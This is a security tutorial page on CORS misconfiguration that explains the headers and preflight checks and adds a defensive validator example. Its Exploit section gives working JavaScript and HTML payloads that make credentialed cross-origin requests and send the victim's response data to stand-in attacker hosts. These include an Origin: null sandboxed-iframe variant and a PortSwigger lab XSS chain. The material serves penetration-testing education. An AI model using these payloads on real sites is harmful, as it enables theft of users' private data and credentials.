# CORS Misconfiguration

### CORS (Cross-Origin Resource Sharing) defines a mechanism to enable client-side cross-origin requests.

### The web application fails to properly validate the `Origin` header and returns the header **`Access-Control-Allow-Credentials: true`**.

## Headers:

```http
// response
Access-Control-Allow-Origin: https://normal-website.com
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: WWW-Authenticate,Server-Authorization
Vary: Origin

// request
Origin: null / any website
```

The **`Access-Control-Expose-Headers`** response header allows a server to indicate which response headers should be made available to scripts running in the browser, in response to a cross-origin request.

**`Vary: Origin`** is crucial for preventing cache confusion and **CORS** errors in **CDN** and **browser caching**: it tells caches to key the response on the `Origin` header, so a response carrying one origin's `Access-Control-Allow-Origin` is not served to a different origin.
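To make the validation failure concrete, here is an added example (written for this note, not code from the original page) of a Node.js-style CORS header function in its weak form beside a hardened exact-match allowlist that also sets `Vary: Origin`; the hostnames and probe origins are constructed.

```javascript
// Added example: server-side Origin validation, weak vs. hardened.
// Hostnames and probe origins below are constructed for the example.

const ALLOWED_ORIGINS = new Set([
  'https://normal-website.com',
  'https://app.normal-website.com',
]);

// Misconfigured: trusts whatever the Origin header says and allows credentials.
function corsHeadersWeak(origin) {
  if (!origin) return {};
  return {
    'Access-Control-Allow-Origin': origin,      // reflected verbatim, even "null"
    'Access-Control-Allow-Credentials': 'true', // cookies ride along
  };
}

// Hardened: exact string match against an allowlist, never the literal "null",
// and Vary: Origin on every response so caches key on the Origin header.
function corsHeadersStrict(origin, allowlist = ALLOWED_ORIGINS) {
  const headers = { 'Vary': 'Origin' };
  if (typeof origin !== 'string' || origin === 'null') return headers;
  if (!allowlist.has(origin)) return headers; // no startsWith/endsWith/regex
  headers['Access-Control-Allow-Origin'] = origin;
  headers['Access-Control-Allow-Credentials'] = 'true';
  return headers;
}

// Origins a defender's tests should feed to any CORS validator (constructed).
const PROBE_ORIGINS = [
  'https://normal-website.com',                  // legitimate, must be granted
  'null',                                        // sandboxed iframe (see below)
  'https://normal-website.com.attacker.example', // suffix lookalike
  'https://attackernormal-website.com',          // prefix lookalike
  'http://normal-website.com',                   // scheme downgrade
];

// Returns the probe origins to which a validator grants credentialed access.
function grantedOrigins(validator, origins = PROBE_ORIGINS) {
  return origins.filter(
    (o) => validator(o)['Access-Control-Allow-Credentials'] === 'true'
  );
}

console.log('weak grants  :', grantedOrigins(corsHeadersWeak));
console.log('strict grants:', grantedOrigins(corsHeadersStrict));
```

The weak validator grants credentialed access to every probe origin; the strict one grants only the exact allowlisted origin and still emits `Vary: Origin` on rejections.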

### Pre-flight checks:

```http
OPTIONS /data HTTP/1.1
Host: <some website>
...
Origin: https://normal-website.com
Access-Control-Request-Method: PUT
Access-Control-Request-Headers: Special-Request-Header
```

## Impact:

* **Data Theft:** of API keys, SSH keys, personally identifiable information (PII), or users' credentials.
* **Cross-Site Scripting (XSS)**: Attackers can use CORS vulnerabilities to perform XSS attacks by injecting malicious scripts into web pages to steal session tokens or perform unauthorized actions on behalf of the user.
* **Remote Code Execution** in some cases ([StackStorm case](https://quitten.github.io/StackStorm/))

## Exploit:

```javascript
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
req.setRequestHeader('Very', 'origin');
req.withCredentials = true;
req.send();

function reqListener() {
   location='//malicious-website.com/log?key='+encodeURIComponent(this.responseText);
};
```

#### For sending with the `Origin: null` header:

```html
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','vuln-web.com/sensitive-data',true);
    req.setRequestHeader('Very', 'origin');
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='malicious_site.com/log?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>

```

#### If only the origin of a sub-domain is accepted, then an XSS in the target sub-domain is needed.

A demo payload from PortSwigger:

```html
<script>
    document.location="http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
```

#### To read Header Value:

```html
<script>
const client = new XMLHttpRequest();
client.open("GET", "http://localhost:8000", true);
client.send();

client.onreadystatechange = () => {
  if (client.readyState === client.HEADERS_RECEIVED) {
    // Readable only if the server listed it in Access-Control-Expose-Headers
    const authHeader = client.getResponseHeader("Authorization");
    alert(authHeader);
  }
};
</script>
```

### Additional Resource:

* <https://www.freecodecamp.org/news/exploiting-cors-guide-to-pentesting/>

### Example Reports:
